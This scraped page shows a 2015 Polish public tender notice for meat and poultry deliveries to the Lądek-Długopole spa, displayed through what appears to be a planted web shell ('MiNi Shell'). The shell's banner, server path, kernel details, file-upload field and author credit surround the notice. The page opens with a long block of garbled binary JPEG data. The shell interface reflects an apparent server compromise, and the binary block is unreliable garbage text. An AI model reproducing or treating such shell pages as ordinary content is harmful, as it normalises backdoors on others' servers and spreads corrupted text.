JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150512/110592-N-2015.html

<p class="kh_header"><b>Lądek-Zdrój: Sukcesywne  dostawy mięsa i produktów mięsnych oraz  drobiu dla  Uzdrowiska Lądek-Długopole  S.A</b><br>
<b>Numer ogłoszenia: 110592 - 2015; data zamieszczenia: 12.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek-Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 74 8 115 470, faks 74 8 115 470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot Leczniczy - Spółka Akcyjna Województwa Dolnośląskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne  dostawy mięsa i produktów mięsnych oraz  drobiu dla  Uzdrowiska Lądek-Długopole  S.A.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia są sukcesywne dostawy mięsa i produktów mięsnych oraz drobiu  w ilości i asortymencie określonym w załącznikach  nr 1a  i/lub 1b do SIWZ. Szczegółowy opis przedmiotu zamówienia zawiera załącznik A i B do SIWZ. 2.  Przedmiot zamówienia winien być wytwarzany zgodnie z obowiązującymi przepisami, a w szczególności z: a) Ustawą z dnia 25.08.2006  r. o bezpieczeństwie  żywności i żywienia (Dz. U. z 2010r. Nr 136, poz. 914 z późn. zm.)  oraz aktami wykonawczymi wydanymi na podstawie tej ustawy, b) Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 08 stycznia 2015r. w sprawie znakowania środków spożywczych (Dz. U. z 2014r. poz. 669 z póżn. Zm.). 3.   Warunki dodatkowe dotyczące przedmiotu zamówienia:  Dostawy przedmiotu zamówienia winny być  realizowane do obiektów Uzdrowiska Lądek-Długopole  SA, do magazynów żywnościowych położonych w punktach żywienia w Lądku-Zdroju (Szp. Uzdr.  Jubilat, ul. Wolności 4a i Szp. Uzdr. Jan, ul. Paderewskiego 7) oraz w Długopolu-Zdroju (Szp. Uzdr. Mieszko, ul. Zdrojowa 8 i Szp. Uzdr. Dąbrówka, ul. Wolna 4), transportem  Wykonawcy i na jego koszt. 4.   Przedmiot zamówienia winien być dostarczony wyłącznie specjalistycznym środkiem transportu - chłodnią, spełniającym warunki określone w Rozporządzeniu Ministra Zdrowia z dnia 25.08.2006 roku w  sprawie bezpieczeństwa żywności i żywienia (Dz.U nr j.w.). 5.   Każde zamówienie Zamawiającego będzie składane na piśmie (dopuszczalna jest  forma faksu, e - maila i telefoniczna ), przez specjalistę ds. żywienia lub magazyniera, do godziny 10:00 w dniu poprzedzającym dostawę z określeniem asortymentu i jego ilości. 6.   Wykonawca zobowiązuje się do dostaw towarów,  które będą odbywały się w okresie obowiązywania   umowy - sukcesywnie- w/g ustalonego, tygodniowego harmonogramu tj.:  -- Dla mięsa i produktów mięsnych:  dwa  razy w tygodniu -  w poniedziałki i czwartki w godzinach od 7:00 - 11:00 a w uzasadnionych   przypadkach także w inne dni wskazane przez Zamawiającego,  na podstawie  szczegółowych zamówień  z poszczególnych obiektów, złożonych pisemnie, telefonicznie, (faksem) lub e - mailem przez osoby upoważnione przez Zamawiającego, zgodnie z formularzem cenowym -  załącznikiem nr 1a do SIWZ. Towary muszą spełniać wszelkie wymagania przewidziane obowiązującym prawem tj.: zgodnie z obowiązującymi normami, w  szczególności wszelkie wymagania weterynaryjne.  
-- Dla dostaw drobiu: trzy razy w tygodniu tj. w poniedziałki, środy i piątki , a w uzasadnionych   przypadkach także w inne dni wskazane przez Zamawiającego, w godzinach od 7:00 do 10:00,  na podstawie szczegółowych zamówień z poszczególnych obiektów, złożonych pisemnie, telefonicznie, (faksem) lub e-mailem przez osoby upoważnione przez Zamawiającego, zgodnie z formularzem cenowym -  załącznikiem nr 1b do SIWZ.  7.  Wykonawca zobowiązuje się realizować na  rzecz  Zamawiającego systematycznie dostawy produktów  wyszczególnionych  w formularzach  cenowych  stanowiących  załączniki nr  1a  i/lub 1b do SIWZ. 8.  Wykonawca będzie wykonywał dostawy na podstawie szczegółowych zamówień z poszczególnych obiektów złożonych pisemnie (dopuszczalna jest  forma faksu i e-maila ), w trakcie bieżącej dostawy przez osoby upoważnione przez Zamawiającego. 9. Ze strony Zamawiającego upoważnionymi do odbioru towaru i sprawdzenia jego jakości są pracownicy Działu Żywienia tj. magazynierzy oraz odpowiedni Kierownicy. 10. Dostarczane produkty winny spełniać wszystkie wymogi określone w  obowiązujących dla nich  normach. Mięso i produkty mięsne oraz drób muszą charakteryzować się odpowiednim smakiem, zapachem  i wyglądem, właściwym dla danego produktu. Dostarczane do Zamawiającego mięsa i produkty mięsne muszą pochodzić od producentów będących pod opieką weterynaryjną i sanitarną. Zamawiający  wymaga aby  produkty  posiadały  oznaczony termin przydatności do spożycia i powinny być dostarczone  nie później niż przed upływem połowy tego terminu. 11.    Ewentualne zmiany dotyczące zamówienia będą odbywać się w formie telefonicznej. Wykonawca  gwarantuje Zamawiającemu, że przedmiot zamówienia będzie wolny od cech powszechnie  uznawanych za wady jakościowe takie jak: gorzki, kwaśny zbyt słony smak, stęchły, zanieczyszczony mechanicznie, z objawami pleśni, psucia, zawilgocenia oraz uszkodzenia. 12. Opakowanie i oznakowanie dostawy:   a) Przedmiot zamówienia dostarczany będzie w opakowaniach  zbiorczych - koszach plastikowych, zamykanych  odpowiednio oznakowanych zgodnie z przepisami, ułożony wg  asortymentu w sposób gwarantujący zachowanie najwyższej jakości produktu.  13.   Towar dostarczony przez Wykonawcę musi być: - I gatunku, pozbawiony wad, odpowiadający wymaganym cechom dostarczanego produktu co do koloru, zapachu i konsystencji, - opatrzony w odpowiednie oznakowanie zawierające: nazwę producenta, warunki przechowywania i datę przydatności do spożycia, - posiadać właściwe atesty, stosownie do obowiązujących przepisów. Zakres zamówienia zawiera się w kwocie o wartości szacunkowej powyżej 30 000 euro, a poniżej progów ustalonych na podstawie art. 11 ust.8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. z 2013r. poz. 907, z późn. zm.) zwaną dalej Pzp.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium dla całego zamówienia w wysokości:  15 000,00 zł.  (słownie:  piętnaście tysięcy  złotych) w tym:a)  dla części 1: 12 000,00 zł.  (słownie: dwanaście  tysięcy  zł), b)  dla części 2: 3 000,00 zł (słownie: trzy tysiące  zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu niezbędnych uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają taki obowiązek wg zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku Wykonawca zobowiązany jest przedstawić: podpisany przez Wykonawcę wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych  dostaw, min. 1 dostawy (dla każdej części zamówienia), polegających na dostarczeniu produktów spożywczych tj. mięsa i produktów mięsnych o wartości brutto  na co   najmniej: 560 tys. zł. (słownie: pięćset sześćdziesiąt tysięcy złotych) dla części 1 oraz o wartości brutto na co najmniej  170 tys. zł. (słownie: sto siedemdziesiąt tysięcy złotych) dla  części 2, w okresie ostatnich trzech lat  przed upływem  terminu składania ofert a jeżeli okres prowadzenia  działalności jest krótszy - w  tym  okresie, wraz  z podaniem  przedmiotu, daty wykonania i  podmiotu, na rzecz którego  dostawa  została wykonana oraz załączeniem po min. 1 poświadczeniu -  dowodu potwierdzającego, że dostawa została  wykonana lub jest  wykonywana należycie - wg  załącznika nr 6 do  SIWZ (Doświadczenie Wykonawcy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu potencjału  technicznego pozwalającego na wykonanie zamówienia wg załącznika  nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o dysponowaniu osobami zdolnymi do wykonania zamówienia wg załącznika  nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu odpowiedniej sytuacji ekonomicznej i finansowej niezbędnej do wykonania zamówienia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca powinien wykazać się realizacją  min. 1 dostawy (dla każdej części  zamówienia),  polegających na dostarczeniu mięsa i produktów mięsnych o wartości brutto na co  najmniej: 560 tys. zł. (słownie: pięćset sześćdziesiąt tysięcy złotych) dla  części 1, oraz na co najmniej 170 tys. zł. (słownie: sto siedemdziesiąt tysięcy złotych)  brutto dla części 2 zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)  decyzje odpowiednich służb sanitarnych i/lub weterynaryjnych , że mięsa i produkty mięsne  pochodzą od producentów będących pod opieką weterynaryjną i sanitarną. b) decyzje odpowiednich służb sanitarnych i/lub weterynaryjnych  potwierdzających   posiadanie przez Wykonawcę  minimum jednego specjalistycznego środka transportu - chłodni do przewozu art. spożywczych tj. mięsa i produktów mięsnych oraz drobiu, c) oświadczenia Wykonawcy: o wdrożeniu lub wdrażaniu zasad GMP (dobra praktyka produkcyjna), GHP (dobra praktyka higieniczna) i systemu HACCP w firmie - dotyczy części 1 i/lub 2 zamówienia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Wypełniony i podpisany formularz ofertowy -  wg załącznika nr 1 do SIWZ. 2.  Wypełnione i podpisane formularze cenowe -  wg załączników nr 1a  i/lub 1b  do SIWZ. 3. Zaakceptowany projekt  umowy  stanowiący  załącznik  nr 5  do  SIWZ, 4. Dokument lub pełnomocnictwo, z których wynika uprawnienie osoby(osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli to prawo nie wynika z rejestru. W takiej sytuacji dokument ten lub pełnomocnictwo muszą być integralną częścią oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany są dopuszczalne:    Zmiana terminu realizacji umowy: - wynikać będzie z okoliczności, za które strony umowy nie ponoszą odpowiedzialności, - wynikać będzie  z przyczyn leżących po stronie Zamawiającego, których nie można było przewidzieć w chwili wszczęcia postępowania w wyniku, którego zawarto umowę; - wykonanie umowy w pierwotnym terminie byłoby dla Zamawiającego niekorzystne lub niezasadne, czego nie można było przewidzieć w chwili zawarcia umowy;  - zmiana terminu realizacji umowy z powodu niewykorzystania w pełnym zakresie zamówień umożliwiające przedłużenie czasu trwania umowy o następne okresy. Zmiana wynagrodzenia: - w przypadku udokumentowanej zmiany cen żywca o minimum 20% w  stosunku do  cen obowiązujących w dniu podpisania umowy (w części 1), -  w przypadku udokumentowanej zmiany cen towarów o minimum 20% w  stosunku do cen obowiązujących w dniu podpisania umowy (w części 2). - zmieniona zostanie stawka podatku VAT na produkty będące przedmiotem umowy (zmiana wynagrodzenia nastąpi wyłącznie w zakresie stawki podatku VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek-Długopole S. A.,  ul. Wolności 4,  57-540 Lądek Zdrój, pok. nr 4, parter  (Dział Zamówień Publicznych i Zaopatrzenia).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2015 godzina 11:00, miejsce: Uzdrowisko Lądek-Długopole S. A.,  ul. Wolności 4,  57-540 Lądek Zdrój, pok. nr 105, I piętro (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com